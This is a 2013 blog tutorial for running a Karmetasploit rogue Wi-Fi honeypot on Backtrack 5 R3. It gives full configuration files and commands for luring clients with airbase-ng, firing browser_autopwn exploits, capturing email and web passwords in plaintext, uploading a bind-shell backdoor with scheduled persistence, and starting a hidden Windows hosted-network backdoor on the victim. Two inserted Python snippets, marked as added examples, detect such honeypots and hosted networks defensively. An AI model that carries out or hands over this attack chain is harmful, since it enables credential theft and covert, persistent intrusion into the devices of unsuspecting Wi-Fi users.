Friday 14 June 2013

Karmetasploit in BT5 R3[TUT][WIFI]

Alright guys, what we're going to be doing today is setting up karmetasploit on backtrack 5 r3. This isn't a difficult attack, there's just a little bit of configuration to do first. The attack itself is the easy part. Since Karmetasploit is a few years old, a lot of how it works just doesn't fit into backtrack anymore (for example, lines one and two of the original karma.rc use sqlite3, which metasploit doesn't use anymore). The hardest part of this whole tutorial has been trying to make all of the parts of an old yet awesome attack work together again with a newer version of backtrack. I also threw in some other stuff that could help the attack, such as increasing the power of your wireless card (which will increase your attack's range) and a couple of backdoor possibilities, including a wireless backdoor on a windows 7 victim.

This is basically an advanced mis-association attack: we create a honeypot using backtrack 5, aircrack-ng, metasploit, and KARMA. It's kind of a culmination of what I've been doing in other tutorials with software access points and I'm pretty excited to see what you guys think of it. It might be a good idea to brush up on honeypots and SoftAPs first. Check these tutorials out before we get started:

Mis-association with Honeypots
Wired to wireless soft AP creation

So here's what we're gonna do:

  1. Make a DHCP configuration file to work with karmetasploit
  2. Create karma.rc
  3. (Optional) Get the most out of your wireless card (I'll be going over commands for an Alfa AWUS036H since it's pretty popular and my personal favorite)
  4. Configure our wireless honeypot using airbase-ng
  5. Create a backdoor .exe (ahead of time)
  6. Launch the karmetasploit attack
  7. A little bit of password stealing
  8. Get a meterpreter session, migrate it, get a shell
  9. Configure and start a hosted network backdoor in windows 7
  10. Maintain access



1. Configuring DHCP Server
Karmetasploit requires a DHCP server working in a specific way, handing out a known range of IP addresses behind our access point, so that this attack can be as automated as possible. I'm going to show you how to use a built-in DHCP server in backtrack, dhcp3-server. Getting dhcp3 to work was a pain in the ass for someone who's not very experienced with linux. From what I found, during the move from R2 to R3 somebody forgot to add a line to the apt sources list, so you have to do this:

-go to /etc/apt/

-open sources.list with the text editor of your choice

-add this under the bottom line of the file:

Code:
deb http://updates.repository.backtrack-linux.org revolution main microverse non-free testing

-now save that and do these two commands:

apt-get update
apt-get upgrade

(just to point out the obvious, these will update backtrack)
-then this:

apt-get install dhcp3-server

Karmetasploit needs a custom dhcpd.conf file. No worries here, just make your config file in /etc/dhcp3 look like this:

Code:
option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
    range 10.0.0.100 10.0.0.254;
    option routers 10.0.0.1;
    option domain-name-servers 10.0.0.1;
}

Don't forget to back up the original!


2. Create Karma.rc resource file for metasploit

So just about all of the links for the original karma.rc are dead. Those that aren't don't work anymore due to certain dependencies that aren't in use anymore, namely sqlite3 in metasploit. Props to John Freimuth for changing the original karma.rc file and posting his updated version for the public:

Copy and paste this into a text file, name it karma.rc, and save it in /opt/metasploit/msf3:

Code:
workspace -d Karma
workspace -a Karma
workspace Karma

use auxiliary/server/browser_autopwn

setg AUTOPWN_HOST 10.0.0.1
setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads

set LHOST 10.0.0.1
set LPORT 45000
set SRVPORT 55550
set URIPATH /ads
run

use auxiliary/server/capture/pop3
set SRVPORT 110
set SSL false
run

use auxiliary/server/capture/pop3
set SRVPORT 995
set SSL true
run

use auxiliary/server/capture/ftp
run

use auxiliary/server/capture/imap
set SSL false
set SRVPORT 143
run

use auxiliary/server/capture/imap
set SSL true
set SRVPORT 993
run

use auxiliary/server/capture/smtp
set SSL false
set SRVPORT 25
run

use auxiliary/server/capture/smtp
set SSL true
set SRVPORT 465
run

use auxiliary/server/fakedns
unset TARGETHOST
set SRVPORT 5353
run

use auxiliary/server/fakedns
unset TARGETHOST
set SRVPORT 53
run

use auxiliary/server/capture/http
set SRVPORT 80
set SSL false
run

use auxiliary/server/capture/http
set SRVPORT 8080
set SSL false
run

use auxiliary/server/capture/http
set SRVPORT 443
set SSL true
run

use auxiliary/server/capture/http
set SRVPORT 8443
set SSL true
run

So there's that. You can read through it to see what exactly karma does. It's pretty awesome.

3. (Optional) Maximizing your Alfa Card

This is some cool stuff that I learned and I thought I could apply it to this tutorial. You can change the power of your alfa card (other cards work the same way, you'll just have to check and see what wattage it uses, and what is a safe dBm to set your card to.)

So what we're going to try to do is increase our EIRP (effective isotropic radiated power), which is calculated as transmitter power in dBm (my alfa is 1 watt, which is equal to 30 dBm) + antenna gain in dBi - the cable loss in dBm (which is why my 5 dBi antenna is actually better than my 9 dBi one). Your card is set to 20 dBm by default, which is 2000 mBm (the max allowed by the default regulatory domain in linux).

We can change this by changing our regulatory domain. There are different regulations for different countries, so look up the regulations for yours if you're worried about breaking the law. I'm in the US, so I'll change to the US guidelines, which will actually increase my max transmission power from 2000 mBm (20 dBm) to 2700 mBm (27 dBm):

Code:
iw reg set US

Now to change our transmission power to utilize almost the full strength of our card:
Code:
iwconfig wlan0 txpower 27

Now we're utilizing a full 7 dBm more than we were before, this is great because it will extend the range of our fake access point later on by a nice noticeable amount, allowing a wider range of victims or a stronger connection to and from what would be existing victims.

4. Wireless honeypot configuration with airbase-ng

First put your card into monitor mode:

Code:
airmon-ng start wlan0

next we're going to create our honeypot with these parameters:

Code:
airbase-ng -P -C 30 -e "Honeypot" -v mon0

now give it an IP address:

Code:
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0

now activate our dhcpd3:

Code:
dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0

You'll probably get an error like "can't create PID file /var/run/dhcpd.pid". Just ignore that; as long as it says "listening on LPF/at0/yourmacaddress/10.0.0/24" and sending on the same interface, you're good.

Let's go ahead and tail our messages log; this will give us some handy information that we can use in a bit:
Code:
tail -f /var/log/messages
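
Since the honeypot we just configured answers every probe request with whatever SSID the client asked for, the same BSSID shows up as many different networks in a monitor-mode capture, which is the simplest thing a defender can look for. The detector below is an added example, not part of the original tutorial or of airbase-ng; it assumes tab-separated input in the shape `tshark -T fields` emits for the fields frame.time_epoch, wlan.fc.type_subtype, wlan.bssid, wlan.sa and wlan.ssid, and the sample capture embedded in it is constructed.

```python
"""Flag access points that answer probe requests with many different SSIDs.

A Karma-style honeypot (airbase-ng -P) replies to every probe request with
the SSID the client asked for, so one BSSID appears to be every network at
once. A legitimate AP answers with its own SSID(s) only, so a BSSID claiming
many unrelated names in probe responses or beacons is a strong indicator.

Input lines (constructed sample below, not a real capture) carry the fields
    frame.time_epoch  wlan.fc.type_subtype  wlan.bssid  wlan.sa  wlan.ssid
separated by tabs, as `tshark -T fields -e ...` would print them.
"""
from collections import defaultdict

PROBE_RESP = 5   # 802.11 management subtype: probe response
BEACON = 8       # 802.11 management subtype: beacon

SAMPLE_LOG = """\
1371200000.10\t4\tff:ff:ff:ff:ff:ff\taa:bb:cc:00:00:01\tCoffeeShop
1371200000.11\t5\t00:c0:ca:11:22:33\t00:c0:ca:11:22:33\tCoffeeShop
1371200000.40\t4\tff:ff:ff:ff:ff:ff\taa:bb:cc:00:00:02\tHomeNet
1371200000.41\t5\t00:c0:ca:11:22:33\t00:c0:ca:11:22:33\tHomeNet
1371200000.90\t4\tff:ff:ff:ff:ff:ff\taa:bb:cc:00:00:01\tAirportFree
1371200000.91\t5\t00:c0:ca:11:22:33\t00:c0:ca:11:22:33\tAirportFree
1371200001.00\t8\t00:c0:ca:11:22:33\t00:c0:ca:11:22:33\tHoneypot
1371200001.20\t8\t00:11:22:33:44:55\t00:11:22:33:44:55\tOfficeWifi
1371200001.30\t5\t00:11:22:33:44:55\t00:11:22:33:44:55\tOfficeWifi
"""

def ssids_per_bssid(lines):
    """Map each AP BSSID to the set of SSIDs it claimed in probe responses or beacons."""
    claimed = defaultdict(set)
    for line in lines:
        if not line.strip():
            continue
        _ts, subtype, bssid, _sa, ssid = line.rstrip("\n").split("\t")
        # tshark prints the subtype as decimal or 0x-prefixed hex depending on version
        code = int(subtype, 16) if subtype.startswith("0x") else int(subtype)
        if code in (PROBE_RESP, BEACON) and ssid:
            claimed[bssid].add(ssid)
    return claimed

def find_karma_aps(lines, threshold=3):
    """Return {bssid: sorted ssids} for every BSSID claiming at least `threshold` distinct SSIDs."""
    return {b: sorted(s) for b, s in ssids_per_bssid(lines).items() if len(s) >= threshold}

if __name__ == "__main__":
    for bssid, ssids in find_karma_aps(SAMPLE_LOG.splitlines()).items():
        print(f"suspicious AP {bssid} answered as {len(ssids)} networks: {', '.join(ssids)}")
```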

5. Creating a backdoor (planning ahead)
Alright, so what we can go ahead and do now is create a backdoor ahead of time, so that we don't have to mess with that in the window between getting a meterpreter shell and the victim disconnecting from wifi. Since we'll be using metasploit from this point on, go ahead and start it:
Code:
msfconsole

Now we know from our DHCP config file that the dhcp starts handing out IPs at 10.0.0.100, so we can create a backdoor configured for this IP ahead of time, maybe a couple of extras (just in case more people authenticate):
Code:
msfpayload windows/shell_bind_tcp RHOST=10.0.0.100 LPORT=4444 X > virus.exe
virus.exe created. Come up with whatever name for it you want, it doesn't matter.

6. Firing up Karmetasploit

So, if all of your configuration is correct at this point in time, you have an at0 interface running a wireless honeypot, a correctly configured dhcpd.conf file, dhcpd running, the messages log being tailed, the correct karma.rc file in the correct location, metasploit running, and our backdoor created, and we're ready to do this step.

Code:
msf > resource karma.rc

This will run karma's resource file inside msfconsole. Feel free to watch as it does its thing. It's gonna fire off all kinds of exploits at the first target that connects to it, but that's just autopwn; anybody who's used that before is familiar with what it does. What sets karma apart is that it starts up POP3 servers and a bunch of stuff like that, so somebody who jumps onto your wifi for a second to check their email is screwed. I'll show you how to pull all of that information in a minute. If you're lucky enough to get a meterpreter session from autopwn, well then good for you! But it's pretty hit and miss, don't be upset if you don't always get one.

7. Stealing Passwords

Okay, remember that messages log that we are tailing? It's pretty handy, and we'll use it now. Whenever it starts doing anything, that's our cue to look back over at metasploit. If you see that a target has been assigned an IP address then they are already being pelted with a wide array of exploits; if the target is making DHCP requests, definitely look over at metasploit and see what's going on, because KARMA will have already intervened. If this situation occurs, you will see something like this in karmetasploit:

Code:
POP3 LOGIN 10.0.0.102:1102 uname / password1

That's obviously what it looks like when someone signs into a pop3 email server, but you get the idea: you get to see all of their passwords in plaintext.

8. Getting meterpreter session and backdooring.

So at this point in time if we're lucky our victim is trying to browse the internet. Hopefully we get a patient client, because karma is busy. He'll get a big loading screen instead of any actual internet activity, and because of this will probably disconnect if he's not patient. If he is patient, he'll sit there while karma sets up the attack to capture cookies, set up other servers, and basically issue a full on assault with exploits. If you're lucky you'll start seeing cookies pop up, which means those of you who know how to session hijack will be having some fun. With any luck, one of your many exploits will stick and you'll have a meterpreter session opened! You can see what kind of machine you've just obtained, and which user you're logged in to by:

Code:
msf > sessions -i 1
meterpreter > sysinfo
meterpreter > getuid

Remember to migrate your session in case they decide to close out of their browser but stay connected:

Code:
meterpreter > run migrate -f

This is going to spawn a new notepad.exe process for our meterpreter session to run under.

At this point, we have a good opportunity to install our backdoor from earlier, this is why we plan ahead. It should take us less than a minute to get a meterpreter session, figure out what we're doing and where we're at, backdoor, and get a shell.

Code:
meterpreter > run scheduleme -e virus.exe

After this we'll have our backdoor uploaded and ready to install at login!

Now to get a shell of their command line, we simply do this:

Code:
meterpreter> shell

And now, with any luck, we have a nice shell running that we can do whatever we want with.

9. Configuring and starting a hosted network backdoor in windows 7

So at this point in the tutorial we have a backdoor uploaded, we're in a shell of their command line, all that is good and well but we're gonna take it a step further and create a wireless backdoor for ourselves!

The hosted network is a software access point available in windows 7 and on (which means you could do this with windows 8 too!). It's meant for creating a personal area network and enabling internet connection sharing, allowing one wireless interface to work as an AP and as a normal client at the same time, but we can abuse that. Let's pretend for a minute that we get a windows 7 victim with karmetasploit. Let's configure our own private hosted network that will be hosted by our victim!

Code:
netsh wlan set hostednetwork mode=allow ssid=whateveryouwant key=alsowhateveryouwant

I want to point out that this will be a wpa2-psk key, there is no other option. Make sure you save that password somewhere so that you don't get locked out of your own backdoor.

Now it's configured but not activated, let's bring it online:
Code:
netsh wlan start hostednetwork

The great thing about this is that nothing changes at all for the victim. There's no connection loss and there's nothing that comes up on the screen to alert the victim [the exception to this after trial and error seems to be intel my wifi technology, which gives a notification, but you have a shell, uninstall it.]

And there you have it! A fully functional wireless network hosted by your victim that you can access to get IP level privileges!
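
Because nothing shows on screen, the only way an admin finds one of these is by asking the machine: `netsh wlan show hostednetwork` reports whether a hosted network is allowed and whether it is currently running. The audit below is an added example, not part of the original tutorial; the sample netsh output it parses is constructed (real output differs slightly between Windows builds, so the checks key on the "Mode", "Status", "SSID name" and "Number of clients" lines only), and the `audit_local_host` helper is a hypothetical wrapper that only works on a Windows box.

```python
"""Audit a Windows host for a configured or running hosted network.

`netsh wlan show hostednetwork` prints a settings block and a status block.
A workstation that should never act as an access point is flagged when the
mode is Allowed, and flagged again when the network is actually Started.
The sample output below is constructed for this example.
"""
import re
import subprocess

SAMPLE_OUTPUT = """\
Hosted network settings
-----------------------
    Mode                   : Allowed
    SSID name              : "whateveryouwant"

Hosted network status
---------------------
    Status                 : Started
    BSSID                  : 02:00:00:00:00:00
    Number of clients      : 1
"""

def parse_hostednetwork(text):
    """Return the 'key : value' lines of the netsh output as a dict (headings are skipped)."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"\s*(.+?)\s*:\s*(.*?)\s*$", line)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields

def hostednetwork_findings(text):
    """Audit findings for one host; an empty list means nothing is configured or running."""
    f = parse_hostednetwork(text)
    findings = []
    if f.get("Mode", "").lower() == "allowed":
        findings.append("hosted network allowed (ssid %s)" % f.get("SSID name", "?"))
    if f.get("Status", "").lower() == "started":
        findings.append("hosted network STARTED with %s client(s)" % f.get("Number of clients", "?"))
    return findings

def audit_local_host():
    """Windows only: query netsh and return the findings. Remediation for a flagged host is
    `netsh wlan set hostednetwork mode=disallow`, which also stops a running hosted network."""
    out = subprocess.run(["netsh", "wlan", "show", "hostednetwork"],
                         capture_output=True, text=True).stdout
    return hostednetwork_findings(out)
```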

10. Maintaining Access

Alright, so at this point we have lured a victim in to a malicious honeypot, exploited them in some way to get a meterpreter shell, created 2 types of backdoors, and we obviously want to maintain some sort of access to this victim, so what do we do?

Well, with the meterpreter backdoor we just fire msfconsole back up; once it's up you're going to open a handler and wait for the user to log in.

Code:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/shell_bind_tcp
msf exploit(handler) > set RHOST 10.0.0.100
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit -z

Just wait, it will open up as soon as they log back in.

How about our wireless backdoor? Well, whenever that computer is on we'll have access to our backdoor. We can connect to it whenever we are in range like any other network, except with IP level access to our victim, which can really be handy in certain cases, especially bypassing access control lists (I'll leave it to you to figure out what else you can do there!)


Well, that's it for this tutorial, I hope you like it and I hope it can teach you something. I worked hard on this tutorial and I'd really appreciate any and all feedback, and if you like it, let me know! Enjoy, and happy hacking!